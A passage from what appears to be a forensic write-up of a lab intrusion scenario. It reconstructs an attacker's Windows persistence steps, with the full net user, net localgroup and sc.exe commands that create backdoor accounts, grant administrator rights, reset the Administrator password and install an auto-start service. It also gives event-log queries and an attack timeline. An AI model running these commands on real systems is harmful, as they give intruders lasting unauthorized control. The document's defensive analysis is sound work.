  SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
  SeBackupPrivilege                         Back up files and directories                                      Enabled
  SeRestorePrivilege                        Restore files and directories                                      Enabled
  SeShutdownPrivilege                       Shut down the system                                               Enabled
  SeDebugPrivilege                          Debug programs                                                     Enabled
  SeAuditPrivilege                          Generate security audits                                           Enabled
  SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
  SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
  SeUndockPrivilege                         Remove computer from docking station                               Enabled
  SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
  SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
  SeCreateGlobalPrivilege                   Create global objects                                              Enabled
  SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
  SeRelabelPrivilege                        Modify an object label                                             Enabled
  SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
  SeTimeZonePrivilege                       Change the time zone                                               Enabled
  SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
  SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

They attempted to add two new users, shuna and shion, but failed without adding the option, /add, to the net user command:

> net user shuna pr1nc3ss!

> net user shion m4st3rch3f!

> net users

  User accounts for \\

  -------------------------------------------------------------------------------
  Administrator            benimaru                 DefaultAccount
  Guest                    rimuru                   WDAGUtilityAccount
  The command completed with one or more errors.

This time around, with the correct command, the two users were successfully created:

> net user /add shuna princess 

  The command completed successfully.

> net user /add shion m4st3rch3f! 

  The command completed successfully.
  
> net users
  
  User accounts for \\

  -------------------------------------------------------------------------------
  Administrator            benimaru                 DefaultAccount
  Guest                    rimuru                   shion
  shuna                    WDAGUtilityAccount
  The command completed with one or more errors.

Another thing the threat actor did for persistence was to change the local administrator's password as well as add the new user, shion, to the localadministrators group:

> net user Administrator ch4ng3dpassword! 

  The command completed successfully.

> net localgroup administrators /add shion
  
  The command completed successfully.
  
> net localgroup administrators

  Alias name     administrators
  Comment        Administrators have complete and unrestricted access to the computer/domain

  Members

  -------------------------------------------------------------------------------
  Administrator
  rimuru
  shion
  The command completed successfully.

The logs below confirms the creation of two new users (Event ID 4720) as well the addition of shion to the localadministrators group (Event ID 4732):

$ cat windows.json | grep -E 'EventId..4720' | jq -r '{Username: .PayloadData1, Time: .TimeCreated}'

  {
    "Username": "Target: TEMPEST\\shuna (S-1-5-21-349058839-1848105669-1528301110-1002)",
    "Time": "2022-06-20T17:27:19.1269169+00:00"
  }
  {
    "Username": "Target: TEMPEST\\shion (S-1-5-21-349058839-1848105669-1528301110-1003)",
    "Time": "2022-06-20T17:27:28.6292691+00:00"
  }
  
$ cat windows.json | grep -E 'EventId..4732' | grep Administrators | jq -r '{Group: .PayloadData1, MemberSID: .PayloadData4, Time: .TimeCreated}'

  {
    "Group": "Target: Builtin\\Administrators (S-1-5-32-544)",
    "MemberSID": "MemberSid: S-1-5-21-349058839-1848105669-1528301110-1003",
    "Time": "2022-06-20T17:27:41.2977760+00:00"
  }

Another persistence method performed was by creating a service (TempestUpdate2) that will run final.exe:

> sc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto 

  [SC] CreateService FAILED 1073:

  The specified service already exists.
  
> sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto

  [SC] CreateService SUCCESS
  
> sc.exe qc TempestUpdate2

  [SC] QueryServiceConfig SUCCESS

  SERVICE_NAME: TempestUpdate2
          TYPE               : 10  WIN32_OWN_PROCESS
          START_TYPE         : 2   AUTO_START
          ERROR_CONTROL      : 1   NORMAL
          BINARY_PATH_NAME   : C:\ProgramData\final.exe
          LOAD_ORDER_GROUP   :
          TAG                : 0
          DISPLAY_NAME       : TempestUpdate2
          DEPENDENCIES       :
          SERVICE_START_NAME : LocalSystem

TIMELINE OF EVENTS

Timestamp

Event

2022-06-20 17:12:56

The file, free_magicules.doc , was downloaded into the workstation.

2022-06-20 17:13:12

The file, free_magicules.doc, was opened in Microsoft Word.

2022-06-20 17:13:35

CVE-2022-30190 (Follina) Execution

2022-06-20 17:13:37

The file, update.zip, was downloaded into the workstation.

2022-06-20 17:15:10

Stage 2 payload (first.exe) was downloaded into the workstation.

2022-06-20 17:15:14

First seen execution of first.exe.

2022-06-20 17:18:48

Download and execution of chisel (ch.exe).

2022-06-20 17:19:05

First seen (assumed) unauthorized login to TEMPEST\benimaru via WinRM.

2022-06-20 17:20:06

PrintSpoofer exploit (spf.exe) was downloaded into the workstation.

2022-06-20 17:21:05

The file, final.exe, was downloaded into the workstation.

2022-06-20 17:21:34

Execution of spf.exe and final.exe.

2022-06-20 17:26:29

Creation of the TempestUpdate2 service for persistence.

2022-06-20 17:27:19

Creation of two users (shuna and shion) as well as addition of shion to the local administrators group.

PreviousBoogeyman 1 NextInfoSec Philippines

Last updated 3 years ago